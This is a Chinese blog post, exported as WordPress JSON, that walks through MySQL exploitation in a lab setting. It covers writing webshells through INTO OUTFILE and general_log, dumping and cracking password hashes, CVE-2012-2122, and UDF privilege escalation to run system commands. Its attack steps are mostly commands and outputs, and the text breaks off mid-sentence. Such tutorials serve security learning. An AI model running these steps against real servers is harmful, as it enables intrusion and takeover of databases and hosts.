{"id":353,"date":"2025-05-06T10:24:01","date_gmt":"2025-05-06T02:24:01","guid":{"rendered":"http:\/\/danielw.top\/?p=353"},"modified":"2025-05-06T10:24:01","modified_gmt":"2025-05-06T02:24:01","slug":"mysql%e6%bc%8f%e6%b4%9e%e5%88%a9%e7%94%a8%e4%b8%8e%e6%8f%90%e6%9d%83","status":"publish","type":"post","link":"http:\/\/danielw.top\/?p=353","title":{"rendered":"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743"},"content":{"rendered":"<h1>MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743<\/h1>\n<h2>\u6743\u9650\u83b7\u53d6<\/h2>\n<h3>\u6570\u636e\u5e93\u64cd\u4f5c\u6743\u9650<\/h3>\n<p>\u63d0\u6743\u4e4b\u524d\u5f97\u5148\u62ff\u5230\u9ad8\u6743\u9650\u7684 MySQL \u7528\u6237\u624d\u53ef\u4ee5\uff0c\u62ff\u5230 MySQL \u7684\u7528\u6237\u540d\u548c\u5bc6\u7801\u7684\u65b9\u5f0f\u591a\u79cd\u591a\u6837\uff0c\u4f46\u662f\u4e0d\u5916\u4e4e\u5c31\u4e0b\u9762\u51e0\u79cd\u65b9\u6cd5\uff1a<\/p>\n<ol>\n<li>MySQL 3306 \u7aef\u53e3\u5f31\u53e3\u4ee4\u7206\u7834<\/li>\n<li>sqlmap \u6ce8\u5165\u7684 <code>--sql-shell<\/code> \u6a21\u5f0f<\/li>\n<li>\u7f51\u7ad9\u7684\u6570\u636e\u5e93\u914d\u7f6e\u6587\u4ef6\u4e2d\u62ff\u5230\u660e\u6587\u5bc6\u7801\u4fe1\u606f<\/li>\n<li>CVE-2012-2122 \u7b49\u8fd9\u7c7b\u6f0f\u6d1e\u76f4\u63a5\u62ff\u4e0b MySQL \u6743\u9650<\/li>\n<\/ol>\n<h3>Webshell \u6743\u9650<\/h3>\n<h4>into oufile \u5199 shell<\/h4>\n<ul>\n<li>\u77e5\u9053\u7f51\u7ad9\u7269\u7406\u8def\u5f84<\/li>\n<li>\u9ad8\u6743\u9650\u6570\u636e\u5e93\u7528\u6237<\/li>\n<li>load_file () \u5f00\u542f \u5373 secure_file_priv \u65e0\u9650\u5236<\/li>\n<li>\u7f51\u7ad9\u8def\u5f84\u6709\u5199\u5165\u6743\u9650<\/li>\n<\/ul>\n<p>\u9996\u5148\u57fa\u7840\u8bed\u6cd5\u67e5\u8be2\u662f\u5426 secure_file_priv \u6ca1\u6709\u9650\u5236<\/p>\n<pre><code class=\"language-sql\">mysql&gt; show global variables like &#039;%secure_file_priv%&#039;;\n+------------------+-------+\n| Variable_name    | Value |\n+------------------+-------+\n| secure_file_priv |       |\n+------------------+-------+<\/code><\/pre>\n<table>\n<thead>\n<tr>\n<th>Value<\/th>\n<th>\u8bf4\u660e<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>NULL<\/td>\n<td>\u4e0d\u5141\u8bb8\u5bfc\u5165\u6216\u5bfc\u51fa<\/td>\n<\/tr>\n<tr>\n<td>\/tmp<\/td>\n<td>\u53ea\u5141\u8bb8\u5728 \/tmp \u76ee\u5f55\u5bfc\u5165\u5bfc\u51fa<\/td>\n<\/tr>\n<tr>\n<td>\u7a7a<\/td>\n<td>\u4e0d\u9650\u5236\u76ee\u5f55<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<blockquote>\n<p>\u5728 MySQL 5.5 \u4e4b\u524d secure_file_priv \u9ed8\u8ba4\u662f\u7a7a\uff0c\u8fd9\u4e2a\u60c5\u51b5\u4e0b\u53ef\u4ee5\u5411\u4efb\u610f\u7edd\u5bf9\u8def\u5f84\u5199\u6587\u4ef6<\/p>\n<p>\u5728 MySQL 5.5 \u4e4b\u540e secure_file_priv \u9ed8\u8ba4\u662f NULL\uff0c\u8fd9\u4e2a\u60c5\u51b5\u4e0b\u4e0d\u53ef\u4ee5\u5199\u6587\u4ef6<\/p>\n<\/blockquote>\n<p>\u5982\u679c\u6ee1\u8db3\u4e0a\u8ff0\u6240\u6709\u6761\u4ef6\u7684\u8bdd\uff0c\u90a3\u4e48\u53ef\u4ee5\u5c1d\u8bd5\u4f7f\u7528\u4e0b\u9762\u539f\u751f\u7684 SQL \u8bed\u53e5\u6765\u76f4\u63a5\u5199 shell\uff1a<\/p>\n<pre><code class=\"language-bash\">select &#039;&lt;?php phpinfo(); ?&gt;&#039; into outfile &#039;\/var\/www\/html\/info.php&#039;;<\/code><\/pre>\n<p>sqlmap \u4e2d\u53ef\u4ee5\u5982\u4e0b\u64cd\u4f5c\uff1a<\/p>\n<pre><code class=\"language-bash\">sqlmap -u &quot;http:\/\/x.x.x.x\/?id=x&quot; --file-write=&quot;\u76ee\u5f55\/shell.php&quot; --file-dest=&quot;\/var\/www\/html\/test\/shell.php&quot;<\/code><\/pre>\n<p>\u4e00\u822c\u60c5\u51b5\u4e0b Linux \u7cfb\u7edf\u4e0b\u9762\u6743\u9650\u5206\u914d\u6bd4\u8f83\u4e25\u683c\uff0cMySQL \u7528\u6237\u4e00\u822c\u60c5\u51b5\u4e0b\u662f\u65e0\u6cd5\u76f4\u63a5\u5f80\u7ad9\u70b9\u6839\u76ee\u5f55\u5199\u5165\u6587\u4ef6\u7684\uff0c\u8fd9\u79cd\u60c5\u51b5\u4e0b\u5728 Windows \u73af\u5883\u4e0b\u6210\u529f\u7387\u4f1a\u5f88\u9ad8\u3002<\/p>\n<h4>\u65e5\u5fd7\u6587\u4ef6\u5199 shell<\/h4>\n<ul>\n<li>Web \u6587\u4ef6\u5939\u5bbd\u677e\u6743\u9650\u53ef\u4ee5\u5199\u5165<\/li>\n<li>Windows \u7cfb\u7edf\u4e0b<\/li>\n<li>\u9ad8\u6743\u9650\u8fd0\u884c MySQL \u6216\u8005 Apache<\/li>\n<\/ul>\n<p>MySQL 5.0 \u7248\u672c\u4ee5\u4e0a\u4f1a\u521b\u5efa\u65e5\u5fd7\u6587\u4ef6\uff0c\u53ef\u4ee5\u901a\u8fc7\u4fee\u6539\u65e5\u5fd7\u7684\u5168\u5c40\u53d8\u91cf\u6765 getshell<\/p>\n<pre><code class=\"language-sql\">mysql&gt; SHOW VARIABLES LIKE &#039;general%&#039;;\n+------------------+---------------------+\n| Variable_name    | Value               |\n+------------------+---------------------+\n| general_log      | OFF                 |\n| general_log_file | DESKTOP-TFMBDA5.log |\n+------------------+---------------------+<\/code><\/pre>\n<p><code>general_log<\/code> \u9ed8\u8ba4\u5173\u95ed\uff0c\u5f00\u542f\u5b83\u53ef\u4ee5\u8bb0\u5f55\u7528\u6237\u8f93\u5165\u7684\u6bcf\u6761\u547d\u4ee4\uff0c\u4f1a\u628a\u5176\u4fdd\u5b58\u5728\u5bf9\u5e94\u7684\u65e5\u5fd7\u6587\u4ef6\u4e2d\u3002<\/p>\n<p>\u53ef\u4ee5\u5c1d\u8bd5\u81ea\u5b9a\u4e49\u65e5\u5fd7\u6587\u4ef6\uff0c\u5e76\u5411\u65e5\u5fd7\u6587\u4ef6\u91cc\u9762\u5199\u5165\u5185\u5bb9\u7684\u8bdd\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u6210\u529f getshell\uff1a<\/p>\n<pre><code class=\"language-bash\"># \u66f4\u6539\u65e5\u5fd7\u6587\u4ef6\u4f4d\u7f6e\nset global general_log = &quot;ON&quot;;\nset global general_log_file=&#039;\/var\/www\/html\/info.php&#039;;\n\n# \u67e5\u770b\u5f53\u524d\u914d\u7f6e\nmysql&gt; SHOW VARIABLES LIKE &#039;general%&#039;;\n+------------------+-----------------------------+\n| Variable_name    | Value                       |\n+------------------+-----------------------------+\n| general_log      | ON                          |\n| general_log_file | \/var\/www\/html\/info.php |\n+------------------+-----------------------------+\n\n# \u5f80\u65e5\u5fd7\u91cc\u9762\u5199\u5165 payload\nselect &#039;&lt;?php phpinfo();?&gt;&#039;;\n\n# \u6b64\u65f6\u5df2\u7ecf\u5199\u5230 info.php \u6587\u4ef6\u5f53\u4e2d\u4e86\nroot@c1595d3a029a:\/var\/www\/html\/$ cat info.php \n\/usr\/sbin\/mysqld, Version: 5.5.61-0ubuntu0.14.04.1 ((Ubuntu)). started with:\nTcp port: 3306  Unix socket: \/var\/run\/mysqld\/mysqld.sock\nTime                 Id Command    Argument\n201031 21:14:46       40 Query    SHOW VARIABLES LIKE &#039;general%&#039;\n201031 21:15:34       40 Query    select &#039;&lt;?php phpinfo();?&gt;<\/code><\/pre>\n<p>\u8fd9\u91cc\u867d\u7136\u53ef\u4ee5\u6210\u529f\u5199\u5165\uff0c\u4f46\u662f\u8fd9\u4e2a info.php \u662f MySQL \u521b\u5efa\u7684 \uff1a<\/p>\n<pre><code class=\"language-bash\">-rw-rw---- 1 mysql mysql 293 Oct 31 21:15 info.php<\/code><\/pre>\n<p>Apache \u8bbf\u95ee\u8fd9\u4e2a php \u6587\u4ef6\u4f1a\u51fa\u73b0 HTTP 500 \u7684\u72b6\u6001\u7801\uff0c\u7ed3\u8bba\u662f Linux \u7cfb\u7edf\u8fd9\u79cd\u60c5\u51b5\u57fa\u672c\u4e0a\u4e0d\u4f1a\u6210\u529f\uff0c\u53ea\u6709\u5728 Windows \u7cfb\u7edf\u4e0b\u6210\u529f\u7387\u4f1a\u9ad8\u4e00\u4e9b\uff0c\u4e0d\u8fc7\u8fd9\u91cc\u8fd8\u662f\u53ef\u4ee5\u5f53\u505a\u5c0f\u77e5\u8bc6\u70b9\u6765\u5b66\u4e60\u8bb0\u5f55\u3002<\/p>\n<p>\u524d\u9762\u5206\u522b\u4ecb\u7ecd\u4e86\u6570\u636e\u5e93\u6743\u9650\u548c Webshell \u6743\u9650\uff0c\u90a3\u4e48\u80fd\u4e0d\u80fd\u5229\u7528\u5df2\u7ecf\u83b7\u53d6\u5230\u7684 MySQL \u6743\u9650\u6765\u6267\u884c\u7cfb\u7edf\u4e3b\u673a\u7684\u547d\u4ee4\u7684\u5462\uff1f\u8fd9\u4e2a\u5c31\u662f\u4e0b\u9762\u4e3b\u8981\u4ecb\u7ecd\u7684\u4e86 MySQL \u63d0\u6743\u7684\u77e5\u8bc6\u70b9\u4e86\u3002<\/p>\n<h3>Hash \u83b7\u53d6\u4e0e\u89e3\u5bc6<\/h3>\n<p>\u5047\u8bbe\u5b58\u5728 SQL \u6ce8\u5165 DBA \u6743\u9650\uff0c\u5982\u679c\u76ee\u6807 3306 \u7aef\u53e3\u4e5f\u662f\u53ef\u4ee5\u8bbf\u95ee\u901a\u7684\u8bdd\uff0c\u53ef\u4ee5\u5c1d\u8bd5\u8bfb\u53d6 MySQL \u7684 Hash \u6765\u89e3\u5bc6\uff1a<\/p>\n<pre><code class=\"language-sql\"># MySQL &lt;= 5.6 \u7248\u672c\nmysql&gt; select host, user, password from mysql.user;\n+-----------+------+-------------------------------------------+\n| host      | user | password                                  |\n+-----------+------+-------------------------------------------+\n| localhost | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |\n| 127.0.0.1 | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |\n| ::1       | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |\n| %         | root | *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B |\n+-----------+------+-------------------------------------------+\n\n# MySQL &gt;= 5.7 \u7248\u672c\nmysql &gt; select host,user,authentication_string from mysql.user;\n+-----------------+---------------+-------------------------------------------+\n| host            | user          | authentication_string                     |\n+-----------------+---------------+-------------------------------------------+\n| localhost       | root          | *66F092A2597D7F96B152112EF0BD650432C2E9A3 |\n| localhost       | mysql.session | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |\n| localhost       | mysql.sys     | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |\n| 192.168.110.129 | root          | *66F092A2597D7F96B152112EF0BD650432C2E9A3 |\n+-----------------+---------------+-------------------------------------------+<\/code><\/pre>\n<p>\u83b7\u53d6\u5230\u7684 MySQL Hash \u503c\u53ef\u4ee5\u901a\u8fc7\u4e00\u4e9b\u5728\u7ebf\u7f51\u7ad9\u6765\u89e3\u5bc6\uff0c\u5982\u56fd\u5185\u7684 CMD5 \uff1a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/img.danielw.top\/image-20250506100644413.png\" alt=\"image-20250506100644413\" \/><\/p>\n<p>\u4e5f\u53ef\u4ee5\u901a\u8fc7 Hashcat \u6765\u624b\u52a8\u8dd1\u5b57\u5178\uff0c\u57fa\u672c\u4e0a\u4f7f\u7528 GPU \u7834\u89e3\u7684\u8bdd\u4e5f\u662f\u53ef\u4ee5\u79d2\u7834\u89e3\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">hashcat -a 0 -m 300 --force &#039;66F092A2597D7F96B152112EF0BD650432C2E9A3&#039; password.txt -O<\/code><\/pre>\n<p><strong>-a \u7834\u89e3\u6a21\u5f0f<\/strong><\/p>\n<p>\u6307\u5b9a\u8981\u4f7f\u7528\u7684\u7834\u89e3\u6a21\u5f0f\uff0c\u5176\u503c\u53c2\u8003\u540e\u9762\u5bf9\u53c2\u6570<\/p>\n<pre><code>- [ Attack Modes ] -\n\n  # | Mode\n ===+======\n  0 | Straight                # \u76f4\u63a5\u5b57\u5178\u7834\u89e3\n  1 | Combination             # \u7ec4\u5408\u7834\u89e3\n  3 | Brute-force             # \u63a9\u7801\u66b4\u529b\u7834\u89e3\n  6 | Hybrid Wordlist + Mask  # \u5b57\u5178+\u63a9\u7801\u7834\u89e3\n  7 | Hybrid Mask + Wordlist  # \u63a9\u7801+\u5b57\u5178\u7834\u89e3<\/code><\/pre>\n<p><strong>-m \u7834\u89e3 hash \u7c7b\u578b<\/strong><\/p>\n<p>\u6307\u5b9a\u8981\u7834\u89e3\u7684 hash \u7c7b\u578b\uff0c\u540e\u9762\u8ddf hash \u7c7b\u578b\u5bf9\u5e94\u7684\u6570\u5b57\uff0c\u5177\u4f53\u7c7b\u578b\u8be6\u89c1\u4e0b\u8868\uff1a<\/p>\n<pre><code>12   | PostgreSQL                                       | Database Server\n131  | MSSQL (2000)                                     | Database Server\n132  | MSSQL (2005)                                     | Database Server\n1731 | MSSQL (2012, 2014)                               | Database Server\n200  | MySQL323                                         | Database Server\n300  | MySQL4.1\/MySQL5                                  | Database Server\n...<\/code><\/pre>\n<p><strong>\u2013force<\/strong><\/p>\n<p>\u5ffd\u7565\u7834\u89e3\u8fc7\u7a0b\u4e2d\u7684\u8b66\u544a\u4fe1\u606f<\/p>\n<p><strong>-O<\/strong><\/p>\n<p><code>--optimized-kernel-enable<\/code> \u542f\u7528\u4f18\u5316\u7684\u5185\u6838\uff08\u9650\u5236\u5bc6\u7801\u957f\u5ea6\uff09<\/p>\n<h3>MySQL \u5386\u53f2\u4e0a\u7684\u6f0f\u6d1e<\/h3>\n<h4>yaSSL \u7f13\u51b2\u533a\u6ea2\u51fa<\/h4>\n<p>MySQL yaSSL SSL Hello Message Buffer Overflow \u8fd9\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e 2008 \u5e74\u5f00\u59cb\u88ab\u66dd\u51fa\u6765\uff0c\u8ddd\u79bb\u73b0\u5728\u5df2\u7ecf\u5341\u51e0\u5e74\u7684\u5386\u53f2\u4e86\uff0c\u6240\u4ee5\u8fd9\u91cc\u6ca1\u6709\u627e\u5230\u5bf9\u5e94\u7684\u73af\u5883\u6d4b\u8bd5\uff0c\u4e0d\u8fc7 MSF \u91cc\u9762\u5df2\u7ecf\u96c6\u6210\u597d\u4e86\u5bf9\u5e94\u7684\u6a21\u5757\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">msf6 &gt; use exploit\/windows\/mysql\/mysql_yassl_hello\nmsf6 &gt; use exploit\/linux\/mysql\/mysql_yassl_hello<\/code><\/pre>\n<h4>CVE-2012-2122<\/h4>\n<p>\u77e5\u9053\u7528\u6237\u540d\u591a\u6b21\u8f93\u5165\u9519\u8bef\u7684\u5bc6\u7801\u4f1a\u6709\u51e0\u7387\u53ef\u4ee5\u76f4\u63a5\u6210\u529f\u767b\u9646\u8fdb\u6570\u636e\u5e93\uff0c\u53ef\u4ee5\u5faa\u73af 1000 \u6b21\u767b\u9646\u6570\u636e\u5e93\uff1a<\/p>\n<pre><code class=\"language-bash\">for i in `seq 1 1000`; do mysql -uroot -p111111 -h 127.0.0.1 -P3306 ; done<\/code><\/pre>\n<p>MSF \u91cc\u9762\u4e5f\u6709\u4e86\u5bf9\u5e94\u7684\u811a\u672c\u6a21\u5757\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528\uff0c\u6210\u529f\u540e\u4f1a\u76f4\u63a5 DUMP \u51fa MySQL \u7684 Hash \u503c\uff1a<\/p>\n<pre><code class=\"language-bash\">msf6 &gt; use auxiliary\/scanner\/mysql\/mysql_authbypass_hashdump\nmsf6 &gt; set rhosts 127.0.0.1\nmsf6 &gt; run<\/code><\/pre>\n<h1>UDF \u63d0\u6743<\/h1>\n<p>\u81ea\u5b9a\u4e49\u51fd\u6570\uff0c\u662f\u6570\u636e\u5e93\u529f\u80fd\u7684\u4e00\u79cd\u6269\u5c55\u3002\u7528\u6237\u901a\u8fc7\u81ea\u5b9a\u4e49\u51fd\u6570\u53ef\u4ee5\u5b9e\u73b0\u5728 MySQL \u4e2d\u65e0\u6cd5\u65b9\u4fbf\u5b9e\u73b0\u7684\u529f\u80fd\uff0c\u5176\u6dfb\u52a0\u7684\u65b0\u51fd\u6570\u90fd\u53ef\u4ee5\u5728 SQL \u8bed\u53e5\u4e2d\u8c03\u7528\uff0c\u5c31\u50cf\u8c03\u7528\u672c\u673a\u51fd\u6570 version () \u7b49\u65b9\u4fbf\u3002<\/p>\n<h2>\u624b\u5de5\u590d\u73b0<\/h2>\n<h3>\u52a8\u6001\u94fe\u63a5\u5e93<\/h3>\n<p>\u5982\u679c\u662f MySQL &gt;= 5.1 \u7684\u7248\u672c\uff0c\u5fc5\u987b\u628a UDF \u7684\u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u653e\u7f6e\u4e8e MySQL \u5b89\u88c5\u76ee\u5f55\u4e0b\u7684 lib\\plugin \u6587\u4ef6\u5939\u4e0b\u6587\u4ef6\u5939\u4e0b\u624d\u80fd\u521b\u5efa\u81ea\u5b9a\u4e49\u51fd\u6570\u3002<\/p>\n<p>\u90a3\u4e48\u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u53bb\u54ea\u91cc\u627e\u5462\uff1f\u5b9e\u9645\u4e0a\u6211\u4eec\u5e38\u7528\u7684\u5de5\u5177 sqlmap \u548c Metasploit \u91cc\u9762\u90fd\u81ea\u5e26\u4e86\u5bf9\u5e94\u7cfb\u7edf\u7684\u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u3002<\/p>\n<p><strong>sqlmap \u7684 UDF \u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u4f4d\u7f6e<\/strong><\/p>\n<pre><code class=\"language-bash\">sqlmap\u6839\u76ee\u5f55\/data\/udf\/mysql<\/code><\/pre>\n<p>\u4e0d\u8fc7 sqlmap \u4e2d \u81ea\u5e26\u8fd9\u4e9b\u52a8\u6001\u94fe\u63a5\u5e93\u4e3a\u4e86\u9632\u6b62\u88ab\u8bef\u6740\u90fd\u7ecf\u8fc7\u7f16\u7801\u5904\u7406\u8fc7\uff0c\u4e0d\u80fd\u88ab\u76f4\u63a5\u4f7f\u7528\u3002\u4e0d\u8fc7\u53ef\u4ee5\u5229\u7528 sqlmap \u81ea\u5e26\u7684\u89e3\u7801\u5de5\u5177 cloak.py \u6765\u89e3\u7801\u4f7f\u7528\uff0ccloak.py \u7684\u4f4d\u7f6e\u4e3a\uff1a<code>\/extra\/cloak\/cloak.py<\/code> \uff0c\u89e3\u7801\u65b9\u6cd5\u5982\u4e0b\uff1a<\/p>\n<p><strong>Metasploit \u7684 UDF \u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u4f4d\u7f6e<\/strong><\/p>\n<pre><code>MSF \u6839\u76ee\u5f55\/embedded\/framework\/data\/exploits\/mysql<\/code><\/pre>\n<p>Metasploit \u81ea\u5e26\u7684\u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u65e0\u9700\u89e3\u7801\uff0c\u5f00\u7bb1\u5373\u53ef\u98df\u7528\u3002<\/p>\n<h3>\u5bfb\u627e\u63d2\u4ef6\u76ee\u5f55<\/h3>\n<p>\u63a5\u4e0b\u6765\u7684\u4efb\u52a1\u662f\u628a UDF \u7684\u52a8\u6001\u94fe\u63a5\u5e93\u6587\u4ef6\u653e\u5230 MySQL \u7684\u63d2\u4ef6\u76ee\u5f55\u4e0b\uff0c\u8fd9\u4e2a\u76ee\u5f55\u6539\u5982\u4f55\u53bb\u5bfb\u627e\u5462\uff1f\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u7684 SQL \u8bed\u53e5\u6765\u67e5\u8be2\uff1a<\/p>\n<pre><code>mysql&gt; show variables like &#039;%plugin%&#039;;\n+---------------+------------------------------+\n| Variable_name | Value                        |\n+---------------+------------------------------+\n| plugin_dir    | \/usr\/local\/mysql\/lib\/plugin\/ |\n+---------------+------------------------------+<\/code><\/pre>\n<p>\u5982\u679c\u4e0d\u5b58\u5728\u7684\u8bdd\u53ef\u4ee5\u5728 webshell \u4e2d\u627e\u5230 MySQL \u7684\u5b89\u88c5\u76ee\u5f55\u7136\u540e\u624b\u5de5\u521b\u5efa <code>\\lib\\plugin<\/code> \u6587\u4ef6\u5939\uff1a<\/p>\n<pre><code>mysql &gt; select 233 into dumpfile &#039;C:\\\\PhpStudy\\\\PHPTutorial\\\\MySQL\\\\lib\\\\plugin::$index_allocation&#039;;<\/code><\/pre>\n<p>\u901a\u8fc7 NTFS ADS \u6d41\u521b\u5efa\u6587\u4ef6\u5939\u6210\u529f\u7387\u4e0d\u9ad8\uff0c\u76ee\u524d MySQL \u5b98\u65b9\u8c8c\u4f3c\u5df2\u7ecf\u9609\u5272\u4e86\u8fd9\u4e2a\u529f\u80fd\u3002\u90a3\u4e48\u5982\u679c\u627e\u5230 MySQL \u7684\u5b89\u88c5\u76ee\u5f55\u5462\uff1f\u901a\u7528\u4e5f\u6709\u5bf9\u5e94\u7684 SQL \u8bed\u53e5\u53ef\u4ee5\u67e5\u8be2\u51fa\u6765\uff1a<\/p>\n<pre><code>mysql&gt; select @@basedir;\n+------------------+\n| @@basedir        |\n+------------------+\n| \/usr\/local\/mysql |\n+------------------+<\/code><\/pre>\n<h3>\u5199\u5165\u52a8\u6001\u94fe\u63a5\u5e93<\/h3>\n<p>\u5199\u5165\u52a8\u6001\u94fe\u63a5\u5e93\u53ef\u4ee5\u5206\u4e3a\u4e0b\u9762\u51e0\u79cd\u60c5\u5f62\uff1a<\/p>\n<p>SQL \u6ce8\u5165\u4e14\u662f\u9ad8\u6743\u9650\uff0cplugin \u76ee\u5f55\u53ef\u5199\u4e14\u9700\u8981 secure_file_priv \u65e0\u9650\u5236\uff0cMySQL \u63d2\u4ef6\u76ee\u5f55\u53ef\u4ee5\u88ab MySQL \u7528\u6237\u5199\u5165\uff0c\u8fd9\u4e2a\u65f6\u5019\u5c31\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528 sqlmap \u6765\u4e0a\u4f20\u52a8\u6001\u94fe\u63a5\u5e93\uff0c\u53c8\u56e0\u4e3a GET \u6709<strong>\u5b57\u8282\u957f\u5ea6\u9650\u5236<\/strong>\uff0c\u6240\u4ee5\u5f80\u5f80 POST \u6ce8\u5165\u624d\u53ef\u4ee5\u6267\u884c\u8fd9\u79cd\u653b\u51fb<\/p>\n<pre><code>sqlmap -u &quot;http:\/\/localhost:30008\/&quot; --data=&quot;id=1&quot; --file-write=&quot;\/Users\/sec\/Desktop\/lib_mysqludf_sys_64.so&quot; --file-dest=&quot;\/usr\/lib\/mysql\/plugin\/udf.so&quot;<\/code><\/pre>\n<p><a href=\"https:\/\/image.3001.net\/images\/20201117\/16055961029549.png\" alt=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" title=\"MySQL\u6f0f\u6d1e\u5229\u7528\u4e0e\u63d0\u6743\" target=\"_blank\"  rel=\"nofollow\" ><img decoding=\"async\" src=\"https:\/\/image.3001.net\/images\/20201117\/16055961029549.png\" alt=\"img\" \/><\/a> <\/p>\n<ol>\n<li>\u5982\u679c\u6ca1\u6709\u6ce8\u5165\u7684\u8bdd\uff0c\u6211\u4eec\u53ef\u4ee5\u64cd\u4f5c\u539f\u751f SQL \u8bed\u53e5\uff0c\u8fd9\u79cd\u60c5\u51b5\u4e0b\u5f53 secure_file_priv \u65e0\u9650\u5236\u7684\u65f6\u5019\uff0c\u6211\u4eec\u4e5f\u662f\u53ef\u4ee5\u624b\u5de5\u5199\u6587\u4ef6\u5230 plugin \u76ee\u5f55\u4e0b\u7684\uff1a<\/li>\n<\/ol>\n<pre><code># \u76f4\u63a5 SELECT \u67e5\u8be2\u5341\u516d\u8fdb\u5236\u5199\u5165\nSELECT 0x7f454c4602... INTO DUMPFILE &#039;\/usr\/lib\/mysql\/plugin\/udf.so&#039;;\n\n# \u89e3\u7801\u5341\u516d\u8fdb\u5236\u518d\u5199\u5165\u591a\u6b64\u4e00\u4e3e\nSELECT unhex(&#039;7f454c4602...&#039;) INTO DUMPFILE &#039;\/usr\/lib\/mysql\/plugin\/udf.so&#039;;<\/code><\/pre>\n<p>\u8fd9\u91cc\u7684\u5341\u516d\u8fdb\u5236\u600e\u4e48\u83b7\u53d6\u5462\uff1f\u53ef\u4ee5\u5229\u7528 MySQL \u81ea\u5e26\u7684 hex \u51fd\u6570\u6765\u7f16\u7801\uff1a<\/p>\n<pre><code># \u76f4\u63a5\u4f20\u5165\u8def\u5f84\u7f16\u7801\nSELECT hex(load_file(&#039;\/lib_mysqludf_sys_64.so&#039;));\n\n# \u4e5f\u53ef\u4ee5\u5c06\u8def\u5f84 hex \u7f16\u7801\nSELECT hex(load_file(0x2f6c69625f6d7973716c7564665f7379735f36342e736f));<\/code><\/pre>\n<p>\u4e00\u822c\u4e3a\u4e86\u66f4\u65b9\u4fbf\u89c2\u5bdf\uff0c\u53ef\u4ee5\u5c06\u7f16\u7801\u540e\u7684\u7ed3\u679c\u5bfc\u5165\u5230\u65b0\u7684\u6587\u4ef6\u4e2d\u65b9\u4fbf\u89c2\u5bdf\uff1a<\/p>\n<pre><code>SELECT hex(load_file(&#039;\/lib_mysqludf_sys_64.so&#039;)) into dumpfile &#039;\/tmp\/udf.txt&#039;; \n\nSELECT hex(load_file(0x2f6c69625f6d7973716c7564665f7379735f36342e736f)) into dumpfile &#039;\/tmp\/udf.txt&#039;;<\/code><\/pre>\n<p>\u4e3a\u4e86\u65b9\u4fbf\u5927\u5bb6\u76f4\u63a5\u590d\u5236\uff0c\u56fd\u5149\u8fd9\u91cc\u5355\u72ec\u5199\u4e86\u4e2a\u9875\u9762\uff0c\u6709\u610f\u8005\u81ea\u53d6\uff1a<a href=\"https:\/\/www.sqlsec.com\/tools\/udf.html\" target=\"_blank\"  rel=\"nofollow\" >MySQL UDF \u63d0\u6743\u5341\u516d\u8fdb\u5236\u67e5\u8be2<\/a><\/p>\n<blockquote>\n<pre><code><\/code><\/pre>\n<pre><code>ERROR 1126 (HY000): Can't open shared library 'udf.dll' (errno: 193 )<\/code><\/pre>\n<p>\u7f51\u53cb\u4eec\u53ef\u80fd\u770b\u5230\u8fd9\u4e2a\u62a5\u9519\uff0c\u56e0\u4e3a lib_mysqludf_sys_64.dll \u5931\u8d25\uff0c\u6700\u540e\u4f7f\u7528  lib_mysqludf_sys_32.dll \u624d\u6210\u529f\uff0c\u6240\u4ee5\u8fd9\u91cc\u7684 dll \u5e94\u8be5\u548c\u7cfb\u7edf\u4f4d\u6570\u65e0\u5173\uff0c\u53ef\u80fd\u548c MySQL \u7684\u5b89\u88c5\u7248\u672c\u6709\u5173\u7cfb\uff0c\u800c  PHPStudy \u81ea\u5e26\u7684 MySQL \u7248\u672c\u662f 32 \u4f4d\u7684<\/p>\n<\/blockquote>\n<h3>\u521b\u5efa\u81ea\u5b9a\u4e49\u51fd\u6570\u5e76\u8c03\u7528\u547d\u4ee4<\/h3>\n<pre><code>mysql &gt; CREATE FUNCTION sys_eval RETURNS STRING SONAME &#039;udf.dll&#039;;<\/code><\/pre>\n<p>\u5bfc\u5165\u6210\u529f\u540e\u67e5\u770b\u4e00\u4e0b mysql \u51fd\u6570\u91cc\u9762\u662f\u5426\u65b0\u589e\u4e86 sys_eval\uff1a<\/p>\n<pre><code>mysql&gt; select * from mysql.func;\n+----------+-----+---------+----------+\n| name     | ret | dl      | type     |\n+----------+-----+---------+----------+\n| sys_eval |   0 | udf.dll | function |\n+----------+-----+---------+----------+<\/code><\/pre>\n<p>\u8fd9\u91cc\u7684 sys_eval \u652f\u6301\u81ea\u5b9a\u4e49\uff0c\u63a5\u7740\u5c31\u53ef\u4ee5\u901a\u8fc7\u521b\u5efa\u7684\u8fd9\u4e2a\u51fd\u6570\u6765\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u4e86\uff1a<\/p>\n<pre><code>mysql &gt; select sys_eval(&#039;whoami&#039;);<\/code><\/pre>\n<p>\u5982\u679c\u5728 Windows \u7cfb\u7edf\u4e0b\u7684\u8bdd\u5e94\u8be5\u5c31\u662f\u6700\u9ad8\u6743\u9650\u4e86\uff0c\u6267\u884c\u4e00\u4e9b net user 